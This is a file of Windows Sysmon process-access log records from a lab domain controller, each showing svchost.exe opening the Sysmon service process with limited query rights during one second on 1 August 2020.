{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.741\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.741","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.741\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.741","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.741\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.741","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
